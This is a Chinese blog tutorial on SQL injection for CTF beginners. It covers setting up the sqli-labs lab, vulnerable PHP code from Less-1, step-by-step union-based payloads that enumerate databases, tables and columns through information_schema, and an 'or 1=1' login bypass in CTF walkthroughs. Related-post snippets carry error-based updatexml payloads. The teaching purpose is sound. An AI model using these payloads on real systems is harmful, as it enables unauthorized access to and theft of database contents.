WEB入门——SQL注入(一)

VIP文章 已于 2023-06-03 22:07:07 修改
阅读量1.1k 收藏 6
点赞数
分类专栏: CTF入门 文章标签: 前端 sql 数据库
于 2023-06-03 18:24:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hasntstartisover/article/details/130893102
版权

SQL注入

一、SQL注入的成因

开发人员在开发过程中,直接将URL中的参数、HTTP Body中的Post参数或其他外来的用户输入(如Cookies,UserAgent等)与SQL语句进行拼接,造成待执行的SQL语句可控,从而使我们可以执行任意SQL语句。

二、搭建SQL注入练习平台

  • sqli-labs是一款学习SQL注入的开源平台
  • 下载:https//github.com/skyblueee/sqli-labs-php7
  • 打开phpstady的 www 根目录,解压到根目录下
  • 打开phpMyAdmin 数据库管理工具
  • 在数据库中新建一个security数据库
  • 选择sqli-labs目录中的sql-lab.sql文件,点执行导入到数据库中
  • 打开sqli-labs文件下的sql-connections文件夹中的db-creds.inc文件,修改连接数据库中的密码
    在这里插入图片描述

三、SQL注入分类

3.1 有回显的注入

3.1.1 联合注入

联合注入,表示存在可以使用union关键字进行SQL注入的注入点。
例题:http://localhost/sqli-labs/Less-1/ 源代码中SQL语句部分如下:

<?php
if(isset($_GET['id']))
{
   
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

通过SQL语句中的$id变量,该变量会将GET获取到的参数直接拼接到SQL语句中。如果我们传入参数:

?id=1' union select database() #

那么源代码里面的SQL语就会变成:

$sql="SELECT * FROM users WHERE id='1' union select database() # LIMIT 0,1";

通过传入的单引号闭合前面的单引号,#注释掉后面的语句,中间写上我们需要运行的语句就可以了。

3.1.1.1手动注入一般解题步骤:

  1. 判断网站是否可以进行SQL注入

    • 分别输入不同的id值
    • 有结果:1
    • 有结果:1’ and 1=1#
    • 无结果:1’ and 1=2#

  2. . 依次试一试数据表中有多少列,如果order by 5 报错,则表示有4列。
    ?id=1’ order by 4 #

  3. 查看版本和数据名称 :select 1,2,3…这里根据数据表中的列数来决定参数数量。
    ?id=1’and 1=2 union select 1,version() , database() #

  4. 查看所有数据库:当flag不在当前数据库 可以通过下面的方法查询所有数据库名称,
    ?id=1’and 1=2 union select 1, (select group_concat(schema_name) from information_schema.schemata ) #

  5. 查看数据库中的所有表
    ?id=1’and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 数据库名称) #
    or
    ?id=1’and 1=2 union select 1,(select table_name from information_schema.tables where table_schema = 数据库名称 limit 0,1 ) #

  6. 查看表中的所有字段
    ?id=1’and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 表名) #

  7. 查看字段的所有值
    ?id=1’and 1=2 union select 1,(select 字段名称 from 表名 ) #

关于information_schema:MySQL 中的 information_schema 数据库

3.1.1.2 使用SQLmap工具注入步骤:

参考资料:sqlmap使用教程(超详细)

3.1.1.3 CTF练习
  • [极客大挑战 2019]EasySQL
    在这里插入图片描述
  1. 查看源码,并么有发现SQL语句。尝试弱密码,没有试用出密码。所以尝试注入。
  2. 在BurpSuite中通过Repeater通过手工注入即可得到flag。
    在这里插入图片描述
  • [极客大挑战 2019]LoveSQL
    在这里插入图片描述
  1. 查看源码,没有SQL语句。尝试弱密码登陆也失败了。继续用SQL注入,通过注入username=admin’ or 1=1 #
    在这里插入图片描述
  2. 通过注入可以知道,flag可能藏在了其他数据表中,通过ORDER BY语句查看到该数据表只有3列
    在这里插入图片描述
  3. 使用Union关键字连接两个查询语句,并查询出当前数据库名称:
    在这里插入图片描述
  4. 根据数据库名称查询出所有表名称,使用group_concat()将所有表名连接合并成一个字符串。得到两个数据表名:geekuser和l0ve1ysq1,猜flag可能在l0ve1ysq1表中。
    在这里插入图片描述
  5. 查询l0ve1ysq1表的所有字段名
    在这里插入图片描述
  6. 最后查询表中所有值:得到flag
    在这里插入图片描述

3.1.2 报错注入

3.1.2.1 extractvalue函数

extractevalue函数是对XML文档进行查询的函数。
语法: extractvalue(目标XML文档,XML路径)

mysql> select extractvalue('<div>value</div>','div');
+----------------------------------------+
| extractvalue
最低0.47元/天 解锁文章
HasntStartIsOver
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
啊D——SQL注入工具
12-01
啊D注入工具
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4398
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
[第一章 web入门]SQL注入-1,[第一章 web入门]SQL注入-2
m0_73721944的博客
11-14 72
得到payload:name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+-- 如果觉得太难了,可以在url后加入?id=1 and 1=1--+ 正常。id=1' and 1=1--+ 正常。打开是这样的,很明显在url中存在注入点。
Web安全之SQL注入_web注入,2024年最新【绝对干货
最新发布
jixuczy的博客
04-15 861
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
[第一章 web入门]SQL注入-1BUUCTF
observer的博客
03-14 920
[第一章 web入门]SQL注入-1BUUCTF
[第一章 web入门]SQL注入-1 题目分析与详解
2302_79800344的博客
02-25 885
本题考查SQL注入基础。
[第一章 web入门]SQL注入-1个人李姐
TSiriusL的博客
11-15 277
第一步 ?id=1 ?id=2 ?id=3 ?id=4 因此可以猜测一共有三列 第二步 查询注入空间 -1' union select 1,2,3 --+ 第三步 查找数据库名 -1' union select 1,database(),3--+ 数据库库名为note 第四步 查询数据库内表名 -1' union select 1,database(),group_concat(table_name) from informa...
[第一章 web入门]SQL注入-1
陈艺秋的博客
05-28 1243
拿到题目是一篇日记,是GET型请求方式,我们可以直接在url栏中注入数据。页面无回显,判断为字符型注入,闭合符应该就是单引号。判断注入类型,页面有回显所以不是整型注入。查询flag表中的字段名。无回显,说明有三个字段。爆出表名和数据库名称。
Web安全之SQL注入
qq_42751192的博客
06-09 1812
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3162
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
webSQL注入
observer的博客
03-14 957
[第一章 web入门]SQL注入-1BUUCTF
Web安全----SQL注入
m0_49420271的博客
11-27 1972
时至今日,SQL注入仍是广大渗透爱好者聚焦的攻击方式,每四年更新一次的OWASP TOP 10【链接:link】都能够看到它的身影。今天,很荣幸和大家一起来探讨研究学习SQL注入的一些内容,如有不合适或者不正确的地方,欢迎大家留言。
Web安全】注入攻击
RexHa的博客
12-02 2154
《白帽子讲Web安全》详解注入攻击
[第一章 web入门]sql注入-1
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值